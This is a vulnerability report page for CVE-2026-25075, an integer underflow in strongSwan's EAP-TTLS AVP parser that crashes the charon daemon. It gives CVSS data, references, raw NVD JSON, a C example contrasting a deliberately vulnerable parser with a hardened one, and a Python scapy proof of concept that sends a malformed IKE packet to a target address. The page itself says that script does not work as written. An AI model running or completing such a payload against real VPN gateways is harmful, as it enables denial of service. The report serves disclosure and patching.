Security Vulnerability Report

CVE-2026-25075

Published: 2026-03-23 19:16:39
Last Modified: 2026-05-04 19:16:03

Description

strongSwan versions from 4.5.0 up to, but not including, 6.0.5 contain an integer underflow in the EAP-TTLS AVP parser. An unauthenticated remote attacker can send crafted AVP data with an invalid length field during IKEv2 authentication; because the parser subtracts from the AVP length field without first validating it, the result wraps around and leads either to an excessive memory allocation or to a NULL pointer dereference, crashing the charon IKE daemon (denial of service). Impact is availability only; no confidentiality or integrity impact is recorded.

Weaknesses recorded for this entry: CWE-191 (Integer Underflow (Wrap or Wraparound)) and CWE-476 (NULL Pointer Dereference).
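The bug class the description names, as an added illustrative example that is not strongSwan's code: an EAP-TTLS AVP header parser in the naive form (subtract the header size from the Length field with no check) beside a hardened form that bounds Length on both sides first. The AVP layout (Code 4 bytes, Flags 1 byte, Length 3 bytes, optional Vendor-ID 4 bytes, then data, with Length covering the whole AVP) is from RFC 5281 section 10.1; the sample AVP bytes are constructed for the example, not captured traffic, and the function names are the example's own.

```c
/* Added example, not strongSwan's parser: the unvalidated-subtraction bug
 * class behind CVE-2026-25075, naive parser beside the hardened one.
 * AVP layout (RFC 5281 s.10.1): Code(4) | Flags(1) | Length(3) | [Vendor-ID(4)] | Data
 * Length counts the whole AVP including its header. */
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

#define AVP_FLAG_VENDOR 0x80  /* V bit: Vendor-ID present, header is 12 bytes */

typedef struct {
    uint32_t code;
    uint8_t  flags;
    uint32_t vendor_id;
    size_t   header_len;  /* 8, or 12 when the V flag is set */
    size_t   data_len;    /* bytes of data following the header */
} avp_t;

static uint32_t be32(const uint8_t *p)
{
    return ((uint32_t)p[0] << 24) | ((uint32_t)p[1] << 16) | ((uint32_t)p[2] << 8) | p[3];
}

static uint32_t be24(const uint8_t *p)
{
    return ((uint32_t)p[0] << 16) | ((uint32_t)p[1] << 8) | p[2];
}

/* Naive parser (the vulnerable pattern): trusts Length and subtracts the
 * header size unchecked. When Length < header size the unsigned subtraction
 * wraps (CWE-191) and data_len becomes enormous; a caller that allocates
 * that many bytes gets NULL back and dereferences it (CWE-476), or walks
 * far past the received buffer. Returns the (possibly wrapped) data_len. */
size_t avp_parse_naive(const uint8_t *buf, size_t buf_len, avp_t *out)
{
    if (buf_len < 8) return 0;
    out->code = be32(buf);
    out->flags = buf[4];
    uint32_t avp_len = be24(buf + 5);
    out->header_len = (out->flags & AVP_FLAG_VENDOR) ? 12 : 8;
    out->vendor_id = (out->header_len == 12 && buf_len >= 12) ? be32(buf + 8) : 0;
    out->data_len = (size_t)avp_len - out->header_len;  /* no check: can wrap */
    return out->data_len;
}

/* Hardened parser: Length must be at least the header it claims (8 or 12)
 * and at most the bytes actually received, checked before any subtraction. */
bool avp_parse_checked(const uint8_t *buf, size_t buf_len, avp_t *out)
{
    if (buf_len < 8) return false;
    out->code = be32(buf);
    out->flags = buf[4];
    uint32_t avp_len = be24(buf + 5);
    out->header_len = (out->flags & AVP_FLAG_VENDOR) ? 12 : 8;
    if (avp_len < out->header_len) return false;  /* would underflow */
    if (avp_len > buf_len) return false;          /* claims more than received */
    out->vendor_id = (out->header_len == 12) ? be32(buf + 8) : 0;
    out->data_len = avp_len - out->header_len;
    return true;
}

/* Constructed sample AVPs for the example (not captured traffic). Code 79 = EAP-Message. */
static const uint8_t GOOD_AVP[] = {
    0x00, 0x00, 0x00, 0x4f,  /* Code */
    0x40,                    /* Flags: M set, V clear */
    0x00, 0x00, 0x0c,        /* Length 12 = 8-byte header + 4 bytes data */
    0xde, 0xad, 0xbe, 0xef   /* Data */
};
static const uint8_t BAD_AVP[] = {
    0x00, 0x00, 0x00, 0x4f,
    0x40,
    0x00, 0x00, 0x02,        /* Length 2: smaller than the 8-byte header */
    0xde, 0xad, 0xbe, 0xef
};

size_t naive_data_len(const uint8_t *buf, size_t buf_len)
{
    avp_t a;
    return avp_parse_naive(buf, buf_len, &a);
}

int checked_accepts(const uint8_t *buf, size_t buf_len)
{
    avp_t a;
    return avp_parse_checked(buf, buf_len, &a) ? 1 : 0;
}

int main(void)
{
    printf("good AVP: naive data_len=%zu checked=%d\n",
           naive_data_len(GOOD_AVP, sizeof GOOD_AVP), checked_accepts(GOOD_AVP, sizeof GOOD_AVP));
    printf("bad  AVP: naive data_len=%zu checked=%d\n",
           naive_data_len(BAD_AVP, sizeof BAD_AVP), checked_accepts(BAD_AVP, sizeof BAD_AVP));
    return 0;
}
```

On the bad AVP the naive parser reports a data length near SIZE_MAX, which is exactly the value that turns into a huge allocation or a NULL dereference downstream; the checked parser rejects it, and also rejects a truncated AVP whose Length exceeds the bytes on hand (pass `8` as `buf_len` for GOOD_AVP to see that).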

CVSS Details

CVSS Score (v3.1)
7.5
Severity
HIGH
CVSS Vector (v3.1)
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
CVSS Score (v4.0)
8.7
Severity
HIGH
CVSS Vector (v4.0)
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X

Both vectors agree: reachable over the network, no privileges or user interaction required, and the only impact is high availability loss, consistent with a crash of the charon daemon.

Configurations (Affected Products)

No CPE configuration data is available for this entry; the affected range below is taken from the vulnerability description.

strongSwan >= 4.5.0, < 6.0.5 (fixed in strongSwan 6.0.5)

Note that EAP-TTLS support in strongSwan is provided by the eap-ttls plugin, so the vulnerable parser is only reachable on installations that load that plugin. The Debian LTS advisory in the references indicates that distributions also ship backported fixes for older package versions, so check your vendor package, not only the upstream version number.

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only. As written it is a shape demonstration, not a working trigger: EAP-TTLS AVPs travel inside the TLS tunnel of an IKE_AUTH EAP exchange, so a bare AVP appended to an IKE_SA_INIT header is rejected by charon's IKE parser before any AVP code runs.

```python
# PoC for CVE-2026-25075 strongSwan Integer Underflow
# This script demonstrates the concept of sending a malformed EAP-TTLS AVP packet.
# Requires scapy; the IKEv2 layer lives in scapy.contrib.ikev2, not scapy.all.
from scapy.all import IP, UDP, Raw, RandString, send
from scapy.contrib.ikev2 import IKEv2


def send_malformed_ike_packet(target_ip):
    # Construct a basic IKEv2 header: exchange type 34 (IKE_SA_INIT), flags 0x08 (Initiator).
    # This is a simplified representation for demonstration.
    ike_header = IKEv2(init_SPI=RandString(8), resp_SPI=RandString(8),
                       next_payload="None", version=0x20, exch_type=34,
                       flags=0x08, id=1)
    # Construct a malformed AVP with an invalid length field. The RFC 5281 AVP header is
    # Code(4) | Flags(1) | Length(3), so these bytes encode Code 1, Flags 0xff, Length 0xffffff.
    # In a real exploit, the exact bytes would be crafted to trigger the specific subtraction logic.
    malformed_avp = Raw(b"\x00\x00\x00\x01" + b"\xff\xff\xff\xff" + b"A" * 100)
    packet = IP(dst=target_ip) / UDP(dport=500) / ike_header / malformed_avp
    print(f"[*] Sending malformed packet to {target_ip}...")
    send(packet)  # raw sockets: needs root or CAP_NET_RAW
    print("[*] Packet sent. Check if the daemon crashed.")


if __name__ == "__main__":
    target = "192.168.1.100"  # Replace with actual target IP
    send_malformed_ike_packet(target)
```

References

- https://www.strongswan.org/blog/2026/03/23/strongswan-6.0.5-released.html
- https://www.strongswan.org/blog/2026/03/23/strongswan-vulnerability-(cve-2026-25075).html
- https://www.vulncheck.com/advisories/strongswan-eap-ttls-avp-parsing-integer-underflow
- https://y637f9qq2x.com/posts/cve-2026-25075/
- https://lists.debian.org/debian-lts-announce/2026/03/msg00016.html

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-25075", "sourceIdentifier": "[email protected]", "published": "2026-03-23T19:16:39.313", "lastModified": "2026-05-04T19:16:02.690", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "strongSwan versions 4.5.0 prior to 6.0.5 contain an integer underflow vulnerability in the EAP-TTLS AVP parser that allows unauthenticated remote attackers to cause a denial of service by sending crafted AVP data with invalid length fields during IKEv2 authentication. Attackers can exploit the failure to validate AVP length fields before subtraction to trigger excessive memory allocation or NULL pointer dereference, crashing the charon IKE daemon."}, {"lang": "es", "value": "Las versiones de strongSwan 4.5.0 anteriores a la 6.0.5 contienen una vulnerabilidad de desbordamiento negativo de enteros en el analizador AVP de EAP-TTLS que permite a atacantes remotos no autenticados causar una denegación de servicio mediante el envío de datos AVP manipulados con campos de longitud no válidos durante la autenticación IKEv2. 
Los atacantes pueden explotar la falla al validar los campos de longitud AVP antes de la resta para desencadenar una asignación excesiva de memoria o una desreferenciación de puntero NULL, provocando la caída del demonio IKE charon."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", 
"attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-191"}, {"lang": "en", "value": "CWE-476"}]}], "references": [{"url": "https://www.strongswan.org/blog/2026/03/23/strongswan-6.0.5-released.html", "source": "[email protected]"}, {"url": "https://www.strongswan.org/blog/2026/03/23/strongswan-vulnerability-(cve-2026-25075).html", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/strongswan-eap-ttls-avp-parsing-integer-underflow", "source": "[email protected]"}, {"url": "https://y637f9qq2x.com/posts/cve-2026-25075/", "source": "[email protected]"}, {"url": "https://lists.debian.org/debian-lts-announce/2026/03/msg00016.html", "source": "af854a3a-2127-422b-91ae-364da2661108"}]}}